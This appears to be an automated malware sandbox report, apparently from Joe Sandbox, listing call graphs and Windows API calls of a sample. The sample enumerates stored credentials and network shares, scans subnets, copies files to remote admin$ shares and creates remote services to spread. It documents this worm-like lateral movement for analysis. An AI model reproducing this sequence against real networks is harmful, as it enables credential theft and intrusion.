4855b26 CryptDuplicateHash 6033->6035 6036 4855baa 6033->6036 6034->6016 6034->6017 6037 4855bb1 UnmapViewOfFile 6035->6037 6038 4855b3c CryptHashData 6035->6038 6036->6037 6037->6034 6039 4855b53 LocalAlloc 6038->6039 6040 4855b9f CryptDestroyHash 6038->6040 6039->6040 6041 4855b6b CryptGetHashParam 6039->6041 6040->6037 6042 4855b84 6041->6042 6043 4855b98 LocalFree 6041->6043 6042->6043 6043->6040 6045 4855c19 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6044->6045 6046 4855c2c MapViewOfFile 6045->6046 6047 4855d00 6046->6047 6048 4855c4e CryptDuplicateHash 6046->6048 6047->6016 6049 4855cf7 UnmapViewOfFile 6048->6049 6050 4855c6b CryptHashData 6048->6050 6049->6047 6051 4855c7f LocalAlloc 6050->6051 6052 4855cee CryptDestroyHash 6050->6052 6051->6052 6053 4855c98 CryptGetHashParam 6051->6053 6052->6049 6054 4855ce5 LocalFree 6053->6054 6055 4855cae memcpy FlushViewOfFile 6053->6055 6054->6052 6055->6054 6057 4855a33 6056->6057 6058 4855a6b 6056->6058 6057->6058 6059 4855a45 SetFilePointerEx 6057->6059 6058->6011 6059->6058 6060 4855a60 SetEndOfFile 6059->6060 6060->6058 6062 485a760 6061->6062 6063 4856106 wsprintfW PathCombineW 6062->6063 6064 4856144 6063->6064 6065 485623d 6063->6065 6080 4856477 GetTickCount 6064->6080 6067 485614a 6067->6065 6068 485615a WaitForMultipleObjects 6067->6068 6068->6065 6069 485617e CreateFileW 6068->6069 6070 48561a2 6069->6070 6071 485623c 6069->6071 6081 48557e5 6070->6081 6071->6065 6074 4856235 CloseHandle 6074->6071 6075 48561bb memset StrCatW StrCatW 6076 48561fc 6075->6076 6076->6076 6077 4856207 WriteFile 6076->6077 6078 4856225 FlushFileBuffers 6077->6078 6079 485622c LocalFree 6077->6079 6078->6079 6079->6074 6080->6067 6082 48557fd LocalAlloc 6081->6082 6083 48559a8 6081->6083 6082->6083 6084 4855818 GetSystemDefaultLCID GetTimeZoneInformation 6082->6084 6083->6074 6083->6075 6085 4855841 memcpy NetWkstaGetInfo 6084->6085 6086 4855838 6084->6086 6087 48558fe 6085->6087 6091 485586f 6085->6091 6086->6085 6102 48556d8 6087->6102 6090 4855918 LocalAlloc 6093 4855992 6090->6093 6096 4855930 memcpy 6090->6096 6091->6091 6092 48558bc memcpy 6091->6092 6094 48558cf 6091->6094 6092->6094 6093->6093 6097 48559a1 LocalFree 6093->6097 6095 48558f2 NetApiBufferFree 6094->6095 6098 48558de memcpy 6094->6098 6095->6087 6099 485595a 6096->6099 6097->6083 6098->6095 6110 4855780 CryptBinaryToStringW 6099->6110 6103 48556ef 6102->6103 6104 4855776 6102->6104 6103->6104 6105 48556f7 CryptEncrypt 6103->6105 6104->6090 6104->6093 6105->6104 6106 485571a LocalAlloc 6105->6106 6106->6104 6107 4855731 memcpy CryptEncrypt 6106->6107 6107->6104 6108 4855759 LocalFree 6107->6108 6108->6104 6111 48557a4 LocalAlloc 6110->6111 6112 48557ce LocalFree 6110->6112 6111->6112 6113 48557b9 CryptBinaryToStringW 6111->6113 6112->6093 6113->6112 6114 48557d5 LocalFree 6113->6114 6114->6112 6116 48580fa 6115->6116 6116->6116 6117 4858106 wsprintfW 6116->6117 6118 4857fb7 6 API calls 6117->6118 6119 4858142 6118->6119 6119->5082 6119->5083 6121 4858183 CreateToolhelp32Snapshot 6120->6121 6121->5092 6121->5093 6123 485a046 DuplicateTokenEx 6122->6123 6124 485a05f 6122->6124 6123->6124 6125 4856c5f 13 API calls 6124->6125 6126 485a07a 6125->6126 6145 48575d8 WNetOpenEnumW 6126->6145 6131 4856cc8 3 API calls 6132 485a08e 6131->6132 6133 4856b0e 7 API calls 6132->6133 6140 485a09a 6133->6140 6134 485a0e5 6136 485a0f1 CloseHandle 6134->6136 6137 485a0fb 6134->6137 6136->6137 6138 485a107 6137->6138 6139 485a101 CloseHandle 6137->6139 6139->6138 6140->6134 6141 4856b5f StrCmpIW EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 6140->6141 6142 4856ad0 3 API calls 6140->6142 6143 485a0df 6140->6143 6163 4859534 6140->6163 6141->6140 6142->6140 6200 4856b46 GetProcessHeap HeapFree 6143->6200 6146 48576e9 6145->6146 6147 485760b GlobalAlloc 6145->6147 6155 48576f2 CredEnumerateW 6146->6155 6148 48576e8 6147->6148 6151 4857624 6147->6151 6148->6146 6149 4857627 memset WNetEnumResourceW 6150 48576ce GlobalFree WNetCloseEnum 6149->6150 6149->6151 6150->6148 6151->6149 6153 48575d8 14 API calls 6151->6153 6154 4856b95 14 API calls 6151->6154 6153->6151 6154->6151 6156 485771c 6155->6156 6157 48577c9 6155->6157 6158 48577c0 CredFree 6156->6158 6159 4856b95 14 API calls 6156->6159 6160 48577be 6156->6160 6161 485777e 6156->6161 6157->6131 6158->6157 6159->6156 6160->6158 6161->6156 6162 48569ae 24 API calls 6161->6162 6162->6161 6164 4859544 6163->6164 6165 4859560 wsprintfW 6164->6165 6166 485985f SetLastError 6164->6166 6201 48588d3 6165->6201 6166->6140 6170 4859606 6171 485960b wsprintfW 6170->6171 6172 485962a WNetAddConnection2W PathFileExistsW 6171->6172 6173 4859653 GetLastError 6172->6173 6174 48596c8 6172->6174 6175 48587e7 3 API calls 6173->6175 6174->6166 6176 485984b WNetCancelConnection2W 6174->6176 6182 485966e 6175->6182 6176->6166 6177 48596d5 6179 48596f4 6177->6179 6180 48596df 6177->6180 6178 4859674 GetLastError 6178->6174 6178->6182 6217 485944f 6179->6217 6204 48568b5 6180->6204 6182->6166 6182->6174 6182->6177 6182->6178 6191 48596ad WNetCancelConnection2W 6182->6191 6186 4859726 memset GetSystemTimeAsFileTime wsprintfW CreateServiceW 6189 4859791 StartServiceW 6186->6189 6190 4859809 GetLastError 6186->6190 6187 485982a GetLastError 6188 4859830 6187->6188 6188->6174 6194 4859836 DeleteFileW 6188->6194 6195 48597a6 GetLastError 6189->6195 6196 48597b3 6189->6196 6192 4859816 6190->6192 6193 485981e CloseServiceHandle 6190->6193 6191->6172 6192->6193 6193->6188 6194->6174 6195->6196 6197 48597cc QueryServiceStatus 6196->6197 6198 48597f3 DeleteService CloseServiceHandle 6196->6198 6199 48597e6 Sleep 6196->6199 6197->6196 6197->6198 6198->6193 6199->6197 6199->6198 6200->6134 6202 48588de PathFindFileNameW 6201->6202 6203 48588ed wsprintfW wsprintfW PathFindExtensionW 6201->6203 6202->6203 6203->6170 6203->6171 6205 48568cd 6204->6205 6205->6205 6206 48568d8 GetProcessHeap HeapAlloc 6205->6206 6207 48569a5 6206->6207 6208 4856901 memcpy 6206->6208 6207->6179 6210 485692f 6208->6210 6210->6210 6211 485693a GetProcessHeap HeapAlloc 6210->6211 6212 4856958 memcpy 6211->6212 6213 485699a GetProcessHeap HeapFree 6211->6213 6215 4856e1b 5 API calls 6212->6215 6213->6207 6216 485698e GetProcessHeap HeapFree 6215->6216 6216->6213 6218 485945c 6217->6218 6219 48588d3 PathFindFileNameW 6218->6219 6220 4859489 6219->6220 6221 4856cc8 3 API calls 6220->6221 6224 48594f2 OpenSCManagerW 6220->6224 6222 48594e1 6221->6222 6223 4856735 18 API calls 6222->6223 6223->6224 6224->6186 6224->6187 6228 485892a GetCurrentThread OpenThreadToken 6225->6228 6229 4858a17 GetLastError 6228->6229 6230 4858959 GetTokenInformation 6228->6230 6231 485795f 6229->6231 6232 4858977 GetLastError 6230->6232 6233 4858a0c CloseHandle 6230->6233 6234 4858989 GlobalAlloc 6232->6234 6235 4858a0a 6232->6235 6233->6231 6236 4858a08 GetLastError 6234->6236 6237 485899b GetTokenInformation 6234->6237 6235->6233 6236->6235 6238 48589fd GetLastError 6237->6238 6243 48589ae 6237->6243 6239 48589ff GlobalFree 6238->6239 6239->6235 6240 48589bd GetSidSubAuthorityCount 6240->6243 6241 48589ce GetSidSubAuthority 6241->6243 6242 48589fb 6242->6239 6243->6239 6243->6240 6243->6241 6243->6242 6245 485a1d0 GetProcessHeap HeapAlloc 6244->6245 6246 485a1c9 6244->6246 6248 485a200 GetProcessHeap HeapAlloc 6245->6248 6249 485a32a 6245->6249 6247 485a016 114 API calls 6246->6247 6247->6245 6248->6249 6250 485a219 6248->6250 6251 4856b0e 7 API calls 6250->6251 6252 485a222 6251->6252 6252->6249 6253 485a24e CreateThread 6252->6253 6256 485a286 GetModuleHandleA GetProcAddress 6252->6256 6253->6252 6254 485a322 6253->6254 6295 485a112 6253->6295 6294 4856b46 GetProcessHeap HeapFree 6254->6294 6260 485a237 6256->6260 6257 485a2d8 CloseHandle 6258 485a2ea GetProcessHeap HeapAlloc 6257->6258 6258->6254 6259 485a2f9 GetProcessHeap HeapAlloc 6258->6259 6259->6254 6259->6260 6260->6252 6260->6254 6260->6257 6260->6258 6261 4856ad0 3 API calls 6260->6261 6261->6260 6263 4856b95 14 API calls 6262->6263 6264 48577f1 6263->6264 6265 4856b95 14 API calls 6264->6265 6266 48577fc 6265->6266 6267 4856b95 14 API calls 6266->6267 6268 4857807 GetComputerNameExW 6267->6268 6269 4857825 6268->6269 6270 4857831 CreateThread 6268->6270 6271 4856b95 14 API calls 6269->6271 6272 4857847 CloseHandle 6270->6272 6274 485784e 6270->6274 6421 4858b2e 6270->6421 6271->6270 6272->6274 6276 485786f Sleep 6274->6276 6394 485733c LoadLibraryW 6274->6394 6404 485742c GetIpNetTable 6274->6404 6414 485751b NetServerEnum 6274->6414 6276->6274 6280 4858a95 6279->6280 6281 4858a99 SetEvent 6280->6281 6282 4858a8b Sleep GetSystemMetrics 6280->6282 6283 4858aa6 Sleep 6281->6283 6284 4858aad 6281->6284 6282->6280 6283->6284 6285 4858a23 14 API calls 6284->6285 6291 4858ab2 6285->6291 6286 4858b1e LocalFree 6287 4858ad3 htonl 6288 485a567 8 API calls 6287->6288 6288->6291 6289 4858ae0 htonl inet_ntoa 6290 485641a 4 API calls 6289->6290 6290->6291 6291->6286 6291->6287 6291->6289 6292 4856b95 14 API calls 6291->6292 6293 4858b00 GetProcessHeap HeapFree 6292->6293 6293->6291 6294->6249 6296 485a125 6295->6296 6297 485a19e 6295->6297 6302 485a14d 6296->6302 6308 4859f7a 6296->6308 6299 485a155 6317 48598ab 6299->6317 6300 485a182 GetProcessHeap HeapFree GetProcessHeap HeapFree 6300->6297 6301 485a160 6301->6300 6305 4859534 67 API calls 6301->6305 6302->6299 6302->6301 6306 485a171 6302->6306 6305->6306 6306->6300 6307 4856b5f 5 API calls 6306->6307 6307->6300 6309 485686c 7 API calls 6308->6309 6315 4859f98 6309->6315 6310 485a00c 6310->6302 6311 4859534 67 API calls 6311->6315 6313 485a006 6380 4856b46 GetProcessHeap HeapFree 6313->6380 6315->6310 6315->6311 6315->6313 6316 4856893 3 API calls 6315->6316 6330 4859b63 6315->6330 6316->6315 6318 4856ced 7 API calls 6317->6318 6319 48598c8 6318->6319 6320 4859969 6319->6320 6321 48598d7 CreateThread 6319->6321 6325 4859961 6319->6325 6328 4856d35 3 API calls 6319->6328 6320->6301 6320->6306 6321->6319 6322 485990a SetThreadToken 6321->6322 6391 485988b 6321->6391 6323 4859919 ResumeThread 6322->6323 6324 485993a CloseHandle 6322->6324 6326 4859934 GetLastError 6323->6326 6327 4859927 WaitForSingleObject 6323->6327 6324->6319 6390 4856b46 GetProcessHeap HeapFree 6325->6390 6326->6324 6327->6324 6328->6319 6331 4859b70 6330->6331 6332 4859b87 wsprintfW 6331->6332 6333 4859f01 SetLastError 6331->6333 6334 48588d3 PathFindFileNameW 6332->6334 6333->6315 6335 4859bdb wsprintfW wsprintfW PathFindExtensionW 6334->6335 6337 4859c31 wsprintfW 6335->6337 6338 4859c2c 6335->6338 6339 4859c4a WNetAddConnection2W PathFileExistsW 6337->6339 6338->6337 6340 4859c73 GetLastError 6339->6340 6341 4859ceb 6339->6341 6342 48587e7 3 API calls 6340->6342 6341->6333 6343 4859eef WNetCancelConnection2W 6341->6343 6349 4859c94 6342->6349 6343->6333 6344 4859cf3 6346 4859d0e GetCurrentThread OpenThreadToken 6344->6346 6350 48568b5 15 API calls 6344->6350 6345 4859c9a GetLastError 6345->6341 6345->6349 6347 4859d42 memset GetSystemDirectoryW 6346->6347 6348 4859d2c DuplicateTokenEx 6346->6348 6351 4859eb0 GetLastError 6347->6351 6352 4859d9e PathAppendW PathFileExistsW 6347->6352 6348->6347 6349->6333 6349->6341 6349->6344 6349->6345 6357 4859cd4 WNetCancelConnection2W 6349->6357 6354 4859d08 6350->6354 6353 4859eb6 6351->6353 6355 4859dc5 wsprintfW 6352->6355 6356 4859ebe DeleteFileW 6352->6356 6353->6356 6358 4859ecd 6353->6358 6354->6346 6381 4859972 6355->6381 6356->6358 6357->6339 6360 4859ed4 CloseHandle 6358->6360 6361 4859edc 6358->6361 6360->6361 6361->6341 6363 4859ee1 CloseHandle 6361->6363 6362 4859df2 6364 4859ea6 GetLastError 6362->6364 6365 4859e21 CreateProcessAsUserW 6362->6365 6366 4859e2c CreateProcessW 6362->6366 6363->6341 6364->6353 6367 4859e32 6365->6367 6366->6367 6367->6364 6368 4859e36 WaitForSingleObject GetExitCodeProcess 6367->6368 6369 4859e56 CloseHandle 6368->6369 6370 4859e5b 6368->6370 6369->6370 6371 4859e65 6370->6371 6372 4859e60 CloseHandle 6370->6372 6373 4859e6f 6371->6373 6374 4859e6a CloseHandle 6371->6374 6372->6371 6375 4859e74 CloseHandle 6373->6375 6376 4859e79 6373->6376 6374->6373 6375->6376 6377 4859e83 6376->6377 6378 4859e7e CloseHandle 6376->6378 6377->6358 6379 4859e92 PathFileExistsW 6377->6379 6378->6377 6379->6353 6380->6310 6382 485997f 6381->6382 6383 48588d3 PathFindFileNameW 6382->6383 6384 4859992 wsprintfW 6383->6384 6385 4859abd 6384->6385 6385->6385 6386 4859ae9 wsprintfW 6385->6386 6387 4856735 18 API calls 6386->6387 6388 4859b28 wsprintfW 6387->6388 6388->6362 6390->6320 6392 4859534 67 API calls 6391->6392 6393 48598a2 6392->6393 6395 4857425 6394->6395 6396 485735b GetProcAddress 6394->6396 6395->6274 6397 4857414 GetLastError 6396->6397 6398 4857373 GetProcessHeap RtlAllocateHeap 6396->6398 6399 485741a FreeLibrary 6397->6399 6398->6399 6403 4857398 6398->6403 6399->6395 6400 4857402 GetProcessHeap RtlFreeHeap 6400->6399 6401 48573c0 wsprintfW 6402 4856b95 14 API calls 6401->6402 6402->6403 6403->6400 6403->6401 6405 4857458 6404->6405 6407 4857451 6404->6407 6406 4857461 GetProcessHeap HeapAlloc 6405->6406 6405->6407 6406->6407 6408 4857480 GetIpNetTable 6406->6408 6407->6274 6409 4857502 GetProcessHeap HeapFree 6408->6409 6410 485748c 6408->6410 6409->6407 6410->6409 6411 48574bc wsprintfW 6410->6411 6413 48574fe 6410->6413 6412 4856b95 14 API calls 6411->6412 6412->6410 6413->6409 6418 4857556 6414->6418 6415 485755d 6416 48575cf 6415->6416 6417 48575c6 NetApiBufferFree 6415->6417 6416->6276 6417->6416 6418->6415 6418->6416 6419 485751b 14 API calls 6418->6419 6420 4856b95 14 API calls 6418->6420 6419->6418 6420->6418 6422 485a760 6421->6422 6423 4858b3e memset memset GetAdaptersInfo 6422->6423 6424 4858d2e 6423->6424 6425 4858b9a LocalAlloc 6423->6425 6425->6424 6426 4858bb4 GetAdaptersInfo 6425->6426 6427 4858d24 LocalFree 6426->6427 6441 4858bc4 6426->6441 6427->6424 6428 4858c77 6450 4857d4e NetServerGetInfo 6428->6450 6429 4858bd2 inet_addr inet_addr 6446 485641a MultiByteToWideChar 6429->6446 6433 4856b95 14 API calls 6436 4858c1f GetProcessHeap HeapFree 6433->6436 6434 4858d0d 6434->6427 6439 4858d13 CloseHandle 6434->6439 6436->6441 6437 4858c94 LocalAlloc 6440 4858ca4 inet_addr 6437->6440 6442 4858c88 6437->6442 6438 485641a 4 API calls 6438->6441 6439->6427 6439->6439 6440->6442 6441->6428 6441->6429 6441->6433 6441->6438 6444 4856b95 14 API calls 6441->6444 6442->6434 6442->6437 6443 4858ccf htonl htonl CreateThread 6442->6443 6443->6442 6479 4858ab3 6443->6479 6445 4858c57 GetProcessHeap HeapFree 6444->6445 6445->6441 6447 4856442 GetProcessHeap HeapAlloc 6446->6447 6448 485646e 6446->6448 6447->6448 6449 485645a MultiByteToWideChar 6447->6449 6448->6441 6449->6448 6451 4857d6c 6450->6451 6452 4857d81 NetApiBufferFree 6451->6452 6453 4857d88 6451->6453 6452->6453 6453->6442 6454 4858d39 GetComputerNameExW DhcpEnumSubnets 6453->6454 6455 4858ea0 6454->6455 6464 4858db0 6454->6464 6455->6442 6456 4858e97 DhcpRpcFreeMemory 6456->6455 6457 4858dc0 DhcpGetSubnetInfo 6457->6464 6458 4858de8 DhcpEnumSubnetClients 6458->6464 6459 4858e7e DhcpRpcFreeMemory 6459->6464 6460 4858e2e htonl 6467 485a567 6460->6467 6462 4858e42 htonl inet_ntoa 6463 485641a 4 API calls 6462->6463 6463->6464 6464->6456 6464->6457 6464->6458 6464->6459 6464->6460 6464->6462 6465 4856b95 14 API calls 6464->6465 6466 4858e63 GetProcessHeap HeapFree 6465->6466 6466->6464 6472 485a476 memset socket 6467->6472 6470 485a58b 6470->6464 6471 485a476 8 API calls 6471->6470 6473 485a4d3 htons ioctlsocket 6472->6473 6474 485a55d 6472->6474 6475 485a556 closesocket 6473->6475 6476 485a502 connect select 6473->6476 6474->6470 6474->6471 6475->6474 6476->6475 6477 485a541 __WSAFDIsSet 6476->6477 6477->6475 6478 485a553 6477->6478 6478->6475 6480 4858b1e LocalFree 6479->6480 6485 4858acd 6479->6485 6481 4858ad3 htonl 6482 485a567 8 API calls 6481->6482 6482->6485 6483 4858ae0 htonl inet_ntoa 6484 485641a 4 API calls 6483->6484 6484->6485 6485->6480 6485->6481 6485->6483 6486 4856b95 14 API calls 6485->6486 6487 4858b00 GetProcessHeap HeapFree 6486->6487 6487->6485 6537 4857bf7 GetSystemDirectoryW 6538 4857cc0 6537->6538 6539 4857c1c lstrcatW 6537->6539 6539->6538 6540 4857c36 GetModuleFileNameW 6539->6540 6540->6538 6541 4857c4d PathFindFileNameW wsprintfW 6540->6541 6542 4857c7c 6541->6542 6542->6542 6543 4857c90 CreateProcessW ExitProcess 6542->6543 6544 48567f9 StrCmpIW 6545 4856815 StrCmpW 6544->6545 6546 4856825 6544->6546 6545->6546 6547 4857938 6548 4857941 DisableThreadLibraryCalls 6547->6548 6549 4857950 6547->6549 6548->6549 6550 485b03b 6552 485b04f 6550->6552 6551 485b112 6553 485becb 3 API calls 6551->6553 6555 485aed2 6551->6555 6552->6551 6554 485b0e4 memcpy 6552->6554 6553->6555 6554->6551

                                                                      Executed Functions

                                                                      Function 04859534 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 244servicesharesleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4859534-485955a call 485a760 3 4859560-4859604 wsprintfW call 48588d3 wsprintfW * 2 PathFindExtensionW 0->3 4 485985f 0->4 10 4859606-4859608 3->10 11 485960b-4859625 wsprintfW 3->11 6 4859867-485986c 4->6 8 4859874-4859888 SetLastError 6->8 9 485986e-4859872 6->9 9->8 10->11 12 485962a-4859651 WNetAddConnection2W PathFileExistsW 11->12 13 4859653-4859672 GetLastError call 48587e7 12->13 14 48596c8-48596d0 12->14 19 48596d5-48596d8 13->19 20 4859674-485967d GetLastError 13->20 15 4859844-4859849 14->15 15->6 18 485984b-485985d WNetCancelConnection2W 15->18 18->6 21 48596f4-4859720 call 485944f OpenSCManagerW 19->21 22 48596da-48596dd 19->22 20->15 23 4859683-4859686 20->23 31 4859726-485978f memset GetSystemTimeAsFileTime wsprintfW CreateServiceW 21->31 32 485982a-485982c GetLastError 21->32 22->21 24 48596df-48596ea call 48568b5 22->24 23->15 26 485968c-485968f 23->26 24->21 26->15 29 4859695-485969d 26->29 29->15 33 48596a3-48596a7 29->33 35 4859791-48597a4 StartServiceW 31->35 36 4859809-4859814 GetLastError 31->36 34 4859830-4859834 32->34 33->6 37 48596ad-48596c3 WNetCancelConnection2W 33->37 34->15 40 4859836-485983e DeleteFileW 34->40 41 48597a6-48597b1 GetLastError 35->41 42 48597c2-48597c7 35->42 38 4859816 36->38 39 485981e-4859828 CloseServiceHandle 36->39 37->12 38->39 39->34 40->15 43 48597b3-48597b8 41->43 44 48597ba 41->44 45 48597cc-48597dd QueryServiceStatus 42->45 43->44 46 48597f3-4859807 DeleteService CloseServiceHandle 43->46 44->42 45->46 47 48597df-48597e4 45->47 46->39 47->46 48 48597e6-48597f1 Sleep 47->48 48->45 48->46
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 0485957E
                                                                        • Part of subcall function 048588D3: PathFindFileNameW.SHLWAPI(04867BC8,75BF73E0,?,048595B2), ref: 048588E3
                                                                      • wsprintfW.USER32 ref: 048595C9
                                                                      • wsprintfW.USER32 ref: 048595EF
                                                                      • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 048595FC
                                                                      • wsprintfW.USER32 ref: 0485961A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04859637
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 04859649
                                                                      • GetLastError.KERNEL32 ref: 04859653
                                                                      • GetLastError.KERNEL32(?), ref: 04859674
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 048596B9
                                                                      • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 04859714
                                                                      • memset.MSVCRT ref: 04859735
                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04859742
                                                                      • wsprintfW.USER32 ref: 0485975A
                                                                      • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 04859783
                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04859798
                                                                      • GetLastError.KERNEL32 ref: 048597A6
                                                                      • QueryServiceStatus.ADVAPI32(?,?), ref: 048597D5
                                                                      • Sleep.KERNEL32(00001388), ref: 048597E7
                                                                      • DeleteService.ADVAPI32(?), ref: 048597F7
                                                                      • CloseServiceHandle.ADVAPI32(?), ref: 04859801
                                                                      • GetLastError.KERNEL32 ref: 04859809
                                                                      • CloseServiceHandle.ADVAPI32(?), ref: 04859822
                                                                      • GetLastError.KERNEL32 ref: 0485982A
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000), ref: 048568EB
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 048568F4
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856921
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,74DEE010), ref: 04856946
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 04856949
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856978
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04856995
                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 04856998
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0485699F
                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 048569A2
                                                                      • DeleteFileW.KERNEL32(?), ref: 0485983E
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04859857
                                                                      • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,0485A0AD,00000000,00000000,00000000,00000000,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04859878
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                                                      • String ID: %08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                                                      • API String ID: 719309661-1529897384
                                                                      • Opcode ID: a9170839c9e6b8d18ec9cd1751b613aa955b89f09be4cee25eb1a0fc04f9d53e
                                                                      • Instruction ID: d7b27d11085e722f478865265a7b9b1c082da914b008316e66b7636a6029731c
                                                                      • Opcode Fuzzy Hash: a9170839c9e6b8d18ec9cd1751b613aa955b89f09be4cee25eb1a0fc04f9d53e
                                                                      • Instruction Fuzzy Hash: EC91E9B1508345EBEB219F64D888A9BB6ECEF84304F044E2AF959D2160E774E9489F52
                                                                      Function 04858B2E Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 158memorythreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • memset.MSVCRT ref: 04858B52
                                                                      • memset.MSVCRT ref: 04858B6F
                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04858B8F
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 04858BA0
                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04858BBA
                                                                      • inet_addr.WS2_32(000001B0), ref: 04858BDF
                                                                      • inet_addr.WS2_32(000001C0), ref: 04858BF3
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                        • Part of subcall function 0485641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                        • Part of subcall function 0485641A: HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 04858C24
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858C2B
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 04858C5C
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858C63
                                                                      • LocalAlloc.KERNEL32(00000040,0000000C), ref: 04858C98
                                                                      • inet_addr.WS2_32(255.255.255.255), ref: 04858CA9
                                                                      • htonl.WS2_32(?), ref: 04858CD0
                                                                      • htonl.WS2_32(?), ref: 04858CD8
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04858AB3,00000000,00000000,00000000), ref: 04858CED
                                                                      • CloseHandle.KERNELBASE(?), ref: 04858D17
                                                                      • LocalFree.KERNEL32(?), ref: 04858D28
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 698255058-2422070025
                                                                      • Opcode ID: 82b6f02e21e083d5bd3e3d442f95d802d31c2b2e4d836bc30babeb921d8eed84
                                                                      • Instruction ID: b154985bccba7091aa06fd8a73636da6dfb6ffbde47d73676e2374d6e51ee0f3
                                                                      • Opcode Fuzzy Hash: 82b6f02e21e083d5bd3e3d442f95d802d31c2b2e4d836bc30babeb921d8eed84
                                                                      • Instruction Fuzzy Hash: 9C517E71904306AFD710EF64D88496BBBE9FB88350F108E2EFD85D7110D778E9598B92
                                                                      Function 04856FFE Relevance: 25.6, APIs: 17, Instructions: 125memorypipesleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000014), ref: 04857025
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04857028
                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0485703C
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04857051
                                                                      • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 0485706F
                                                                      • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 0485707F
